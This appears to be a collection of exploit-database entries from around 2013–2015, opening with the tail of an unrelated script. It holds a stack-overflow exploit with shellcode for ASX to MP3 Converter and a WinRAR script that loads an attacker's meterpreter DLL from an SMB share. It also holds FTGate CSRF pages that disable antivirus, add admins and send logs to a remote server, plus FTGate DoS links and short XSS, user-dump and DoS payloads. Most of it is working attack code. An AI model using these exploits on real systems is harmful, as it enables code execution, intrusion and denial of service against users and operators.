for i in extrdata[+2:]:
decoder.append(int(i))
print decoder
def main():
createSnapdirs()
grabFile(xplurl)
if __name__ == "__main__":
main()
'''
# Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow
# Date: 2 Oct 2015
# Exploit Author: ex_ptr
# Vendor Homepage: http://mini-stream.net
# Version: 1.82.50
# Tested on: Windows XP SP3
'''
import struct
filename = "exploit.asx"
dummy = "A"*0x104
EIP = struct.pack('<I', 0x76af3adc)
FFFF = "\xFF\xFF\xFF\xFF"
NOP = "\x90"*4
Shell = ("\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
"\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
"\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
"\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
"\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
"\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
"\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
"\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
"\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
"\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43")
exploit = dummy + EIP + FFFF + NOP + Shell
f = open(filename,'wb')
f.write(exploit)
f.close()
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# Since Settings file of Winrar are saved as a registry file and WinRar executes
# it in an automatic way without checking if it is writing to the Registry keys
# used by winrar, we can create a specially crafted settings file and we can
# overwrite registry keys.
# Since we have access to registry there are various ways we could use this to
# get code execution such as defining "RUN" keys or creating new services etc
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
print "[+] WinRar Settings Import Command Execution [+]\n"
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\","\\\\")
print "[+] Writing Contet To Settings.reg [+]"
evil = 'Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="' + dll + '"\n"LoadAppInit_DLLs"=dword:00000001\n'
print evil
f = open("Settings.reg","w")
f.write(evil)
f.close()
print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-V7-CSRF.txt
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exists within FTGate v7 allowing the following attacks
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable arbitrary remote archiving of logs
3) whitelist arbitrary email addresses
4) add arbitrary mailbox & disable antivirus,
5) remove email attachment blocking for filez.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
disable Antivirus for .exe files: also, has a persistent XSS inject but our
payload gets truncated at 5 chars,
but can corrupt the loading of valid XML returned from database to the WEB
UI.
e.g.
HTTP response after attack outputs corrupted XML generating errors.
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary Admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
when access the above URL it returns XML with all file extensions blocked
on incoming email, we now know ID in database.
so to remove blocking of .cmd we select '11'
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt
Vendor:
================================
www.ftgate.com
Product:
========================================
FTGate 2009 SR3 May 13 2010 Build 6.4.00
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate 2009 that allow us to add
arbitrary remote domains,
disable antivirus scanning for various Email file attachment types, and
finally change settings
to have archived server logs sent to our remote attacker controlled server
for safe keeping.
Exploit code(s):
===============
CSRF(s):
<!DOCTYPE>
<html>
<body onLoad="invertedcross()">
<script>
function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}
</script>
1) add arbitrary domains:
-------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/mailboxes/index.fts?action=save"
method="post">
<input type="text" name="dname" value="hyp3rlinx.com" />
<input type="text" name="dtype" value="4" />
<input type="text" name="fname" value="*" />
<input type="text" name="action" value="domadd" />
<input type="text" name="domain" value="" />
<input type="text" name="newdomain" value="" />
</form>
2) sends archived logs to arbitrary remote server:
--------------------------------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="enable" value="on" />
<input type="text" name="path"
value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="6.6.6.0" />
</form>
3) disable virus scan for .jar or .exe files etc:
-------------------------------------------------
Options to control handling of virus scanning for email attachments Virus
Scanning Mode
Operating mode of the virus scanner mode=0 to Disable Virus Scanning.
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/filters/virus.fts" method="post">
<input type="text" name="action" value="add" />
<input type="text" name="mode" value="0" />
<input type="text" name="extension" value="dll" />
</form>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.00
Vulnerable Parameter(s): [+] domadd, extarcserver & mode
####################################################
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt
Vendor:
================================
www.ftgate.com
Product:
================================
FTGate 2009 SR3 May 13 2010 Build 6.4.000
Vulnerability Type:
=======================
Denial of service (DOS)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple denial of service oppurtunities reside within FTGate 2009 that
allow us to disrupt and shut down
various FTGate services via GET requests by luring victimz to our website
or get them to click our malicious linxs.
Exploit code(s):
===============
DOS:
1) shutdown solight web mail interface on port 80
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36
2) shutdown Monitor server port 8081
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35
3) shutdown FTGate connector server port 8090 listens on address 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38
4) shutdown IMAP server port 143 listening on 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.000
Vulnerable Parameter(s): [+] action, id
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/58425/info
Privoxy is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
Privoxy 3.0.20 is affected; other versions may also be vulnerable.
Response Code (current).: 407
Response Headers (as seen by your browser).:
HTTP/1.1 407 Proxy Authentication Required
Date: Mon, 11 Mar 2013 17:01:59 GMT
Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
Proxy-Authenticate: Basic
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 571
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Request Headers (as seen by the remote website)
Host: c22.cc
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive
source: https://www.securityfocus.com/bid/58421/info
The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
podPress 8.8.10.13 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
source: https://www.securityfocus.com/bid/58334/info
Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.
Versions prior to Verax NMS 2.1.0 are vulnerable.
#!/usr/bin/python
#just based on http://www.example.com/tutorials/general/client.html#basic-example
from pyamf import AMF0, AMF3
from pyamf.remoting.client import RemotingService
client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
amf_version=AMF3)
service = client.getService('userService')
print service.getAllUsers()
source: https://www.securityfocus.com/bid/58319/info
Squid is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
Squid 3.2.5 is vulnerable; other versions may also be affected.
Request
-- cut --
#!/usr/bin/env python
print 'GET /index.html HTTP/1.1'
print 'Host: localhost'
print 'X-HEADSHOT: ' + '%XX' * 19000
print '\r\n\r\n'
-- cut --
Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --
source: https://www.securityfocus.com/bid/58314/info
Varnish Cache is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.
Varnish Cache 2.1.5 is vulnerable; other versions may also be affected.
The following example data is available:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999
HTTP/1.1 200 OK
Content-Length: 2147483647